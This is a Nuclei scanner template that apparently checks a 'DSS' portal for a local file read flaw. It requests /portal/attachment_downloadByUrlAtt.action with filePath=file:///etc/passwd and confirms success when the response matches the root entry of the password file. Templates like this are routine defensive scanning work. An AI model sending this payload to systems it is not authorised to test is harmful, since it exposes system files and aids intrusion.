nuclei-templates/vulnerabilities/other/dss-download-fileread.yaml

25 lines
455 B
YAML
Raw Normal View History

2022-04-07 10:31:28 +00:00
id: dss-download-fileread
info:
2022-04-07 11:37:42 +00:00
name: DSS Download File Read
2022-04-07 10:31:28 +00:00
author: ritikchaddha
severity: high
2022-04-07 11:37:42 +00:00
tags: lfi,dss,lfr
2022-04-07 10:31:28 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200